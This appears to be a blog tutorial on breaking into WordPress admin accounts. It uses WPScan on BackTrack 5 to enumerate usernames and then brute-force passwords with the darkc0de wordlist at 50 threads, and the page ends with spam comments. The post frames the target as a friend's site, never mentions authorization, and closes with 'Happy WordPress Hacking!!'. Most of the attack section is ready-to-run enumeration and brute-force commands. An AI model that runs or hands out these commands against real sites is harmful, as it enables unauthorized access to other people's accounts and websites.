Home / Uncategorized / how to hack wordpress admin password backtrack?

how to hack wordpress admin password backtrack?

WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for information as well as do some fun stuff.Say for example you want to “hack” into your friends WordPress site :-)…or just get some information, whatever.

I’m using BackTrack 5 r3 for this tutorial but you can use kali linux for this they are similar
Step1: You can use it to enumerate usernames, so you can see what usernames are valid on the WordPress site by running this command:
ruby ./wpscan.rb –url www.friends-site.com –enumerate u

2 (1)

Running this command against a real WordPress site will show something like this: 


Now that you know what the usernames are, you can then try to brute force it with a list of passwords. This process takes a while, and you have to have a word list. BackTrack 5 r3 comes with a decent word list, so I’ll use that in this example.
ruby ./wpscan.rb –url www.friends-site.com –wordlist /pentest/passwords/wordlists/darkc0de.lst –username admin

The above command is telling WPScan to attack your friends URL, using the username “admin” with the word list that is located in the/pentest/passwords/wordlists/ folder of Back Track 5.

You can even add threading to make the process a little faster by using this switch: –threads 50

There are a few more things you can do, including scanning for what plugins the site uses, as well as telling you which ones are vulnerable.

Happy WordPress Hacking!!


How to Install WPScan?

Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.

Dependencies :

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

WPScan Installation :

cd /pentest/web/
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
cd wpscan

How to use WPScan?

It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.

wget http://static.hackersgarage.com/darkc0de.lst.gz
gunzip darkc0de.lst.gz

Example usage of this ant application :

Do ‘non-intrusive’ checks…

ruby ./wpscan.rb --url www.hackersgarage.com

Do wordlist password brute force on enumerated users using 50 threads…

ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the ‘admin’ username only…

ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin

Generate a new ‘most popular’ plugin list, up to 150 pages…

ruby ./wpscan.rb --generate_plugin_list 150

Enumerate instaled plugins…

ruby ./wpscan.rb --enumerate p

About Sushil_kumar

Check Also

Donate Me

If you liked our work and effort then please consider to make a Kind of …


  1. adidas tröja dam

    You are a very intelligent person!
    adidas tröja dam

  2. Botas Nieve Isabel Marant

    Hello to every single one, it’s really a pleasant for me to pay a visit this site, it consists of precious Information.
    Botas Nieve Isabel Marant

  3. botas esqui salomon

    Very energetic post, I liked that a lot. Will there be a part 2?
    botas esqui salomon

  4. Thank you a lot for giving everyone remarkably special chance to read in detail from this blog. It is always very cool and stuffed with fun for me personally and my office co-workers to search your site minimum 3 times per week to see the latest tips you have. Of course, I’m so at all times fulfilled considering the beautiful opinions you give. Certain 3 points in this post are clearly the most impressive we’ve had.

  5. timberland m臋skie

    I have to point out my love for your kind-heartedness for men and women that really want help on that area. Your very own commitment to getting the message across appeared to be quite informative and have consistently allowed people just like me to realize their dreams. Your informative facts can mean a whole lot a person like me and somewhat more to my office colleagues. Regards; from all of us.
    timberland m臋skie

Leave a Reply

Your email address will not be published. Required fields are marked *

Engineer Sushil Kumar is Stephen Fry proof thanks to caching by WP Super Cache